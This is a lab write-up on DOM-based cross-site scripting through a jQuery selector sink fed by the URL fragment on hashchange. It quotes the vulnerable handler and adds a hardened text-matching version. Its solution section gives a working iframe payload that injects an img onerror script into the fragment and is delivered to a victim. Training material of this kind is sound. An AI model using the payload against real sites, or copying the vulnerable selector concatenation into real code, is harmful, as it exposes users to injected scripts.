Lab: DOM XSS in jQuery selector sink using a hashchange event
Observe

- Open the Homepage.
- Right click and Inspect the web page.
- Read the source code. We found this code using the hashchange event:
```html
<script>
$(window).on('hashchange', function(){
    var post = $('section.blog-list h2:contains(' + decodeURIComponent(window.location.hash.slice(1)) + ')');
    if (post) post.get(0).scrollIntoView();
});
</script>
```

This code means that if we put a section name in the URL fragment (after the #), the page is auto-scrolled to that section. For example, if we open https://example.com/#Spider Web Security, it auto-scrolls by default to the section "Spider Web Security" on the web page. The decoded fragment is concatenated straight into the jQuery selector string, which is the sink this lab is about.
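A hardened version of the handler, as an added example that is not part of the lab or this writeup: the fragment is compared as plain text against the heading titles instead of being spliced into a jQuery selector. `selectorFromHash`, `findHeadingByHash` and the sample heading objects are assumed names, and the code is written without jQuery so the core logic runs in Node.

```javascript
// Vulnerable pattern from the lab, isolated so the string that reaches $()
// can be inspected: the decoded fragment is concatenated into the selector.
function selectorFromHash(hash) {
  return 'section.blog-list h2:contains(' + decodeURIComponent(hash.slice(1)) + ')';
}

// Hardened replacement: the fragment is never used to build a selector.
// The caller selects the headings with a fixed selector and the fragment
// is only compared, as text, against each heading's textContent.
function findHeadingByHash(headings, hash) {
  let wanted;
  try {
    wanted = decodeURIComponent(hash.slice(1));
  } catch (e) {
    return null; // malformed percent-encoding in the fragment: ignore it
  }
  if (wanted === '') return null;
  for (const h of headings) {
    if (h.textContent.trim() === wanted) return h;
  }
  return null; // no heading with exactly that title
}

// Constructed stand-in for the blog-list headings (in a browser this would be
// document.querySelectorAll('section.blog-list h2')).
const sampleHeadings = [
  { textContent: 'Spider Web Security' },
  { textContent: 'Another Post' },
];

// How the page's handler would use it (browser only, not run here):
// $(window).on('hashchange', function () {
//   var post = findHeadingByHash(document.querySelectorAll('section.blog-list h2'), location.hash);
//   if (post) post.scrollIntoView();
// });
```

With the hardened version a fragment that contains markup simply matches no heading, because it is never handed to jQuery as a selector or HTML string.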
Solution

- Go to the Exploit Server.
- Set the body payload to:

```html
<iframe src="https://example.com/#" onload="this.src+='<img src=x onerror=print()>'"></iframe>
```

- Deliver the payload to the victim.